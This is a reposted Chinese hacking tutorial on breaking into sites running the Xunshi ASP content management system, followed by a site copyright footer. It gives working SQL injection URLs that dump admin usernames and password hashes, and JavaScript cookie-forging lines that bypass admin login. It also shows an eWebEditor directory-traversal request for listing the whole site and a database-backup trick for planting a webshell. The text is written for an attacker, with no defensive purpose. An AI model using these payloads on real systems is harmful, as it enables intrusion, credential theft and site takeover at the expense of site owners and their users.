訊時(shí)漏洞一小結(jié)
以下本文總結(jié)來自黑防去年第9期雜志上的內(nèi)容...
先說一個(gè)注入吧:http://www.xx.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
這里一個(gè)注入
效果如圖:

這樣就很輕松可以得到管理用戶名與密碼..這里md5可以拿去破解.但是現(xiàn)在安全意識(shí)的提高.
密碼復(fù)雜了..很難破出來..那么我們可以通過后來cookies欺騙進(jìn)去
javascript:alert(document.cookie="adminuser="+escape("用戶名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
那么這里就會(huì)出現(xiàn)一種情況了..如果后臺(tái)找不到咋辦呢??請(qǐng)看下一漏洞讓你更輕松達(dá)到你想要的效果:
因?yàn)橛崟r(shí)結(jié)合了ewebeditor程序..而它沒有在處理的時(shí)候忽視了ewebeditor有個(gè)可以列目錄的漏洞
它是做了驗(yàn)證的..但訊時(shí)最沒做好的地方就是驗(yàn)證..我們可以通過cookies欺騙來繞過驗(yàn)證.從而可以
訪問這頁面來列目錄..步驟如下:
javascript:alert(document.cookie="admindj=1")
http://www.xx.com/edit/admin_uploadfile.asp?id=46&dir=../..
效果如圖:

這樣全站目錄都能瞧了..找到后臺(tái)目錄..進(jìn)去..
那么進(jìn)了后臺(tái)怎么拿shell??上傳--備份就ok了..
那么有時(shí)候有些管理在做后臺(tái)功能的時(shí)候把備份頁面去掉了...而他本機(jī)里備份頁面還是存在的..
這個(gè)我也碰到過一次..你都可以通過列目錄來實(shí)現(xiàn)..
javascript:alert(document.cookie="admindj=1")
http://www.xx.com/admin/admin_db_backup.asp?action=BackupData
備份ok..
那么以上兩個(gè)漏洞都被管理封住了...咋辦??上面兩個(gè)是比較常見的..那么下面一個(gè)注入漏洞呢?
在admin目錄下有個(gè)admin_lm_edit.asp頁面..里面的id沒有過濾 那么我們就可以先cookies下
然后訪問此頁面進(jìn)行注入..步驟如下:
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
然后請(qǐng)求admin/admin_chk.asp頁面
輸入注入語句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
效果如圖所示:

版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請(qǐng)保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場(chǎng),如有內(nèi)容涉嫌侵權(quán),請(qǐng)聯(lián)系alex-e#qq.com處理。
關(guān)注官方微信